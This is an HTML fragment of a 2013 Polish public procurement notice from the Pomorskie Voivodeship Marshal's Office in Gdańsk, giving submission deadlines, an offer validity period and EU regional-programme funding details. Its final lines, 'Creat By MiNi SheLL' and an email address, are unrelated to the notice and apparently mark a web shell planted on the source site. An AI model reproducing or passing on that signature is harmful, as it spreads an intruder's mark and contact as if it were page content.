<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzęd Marszałkowski Województwa Pomorskiego w Gdańsku  ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr 133B (1 piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 10:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku  ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr 4a (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 (RPO WP).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com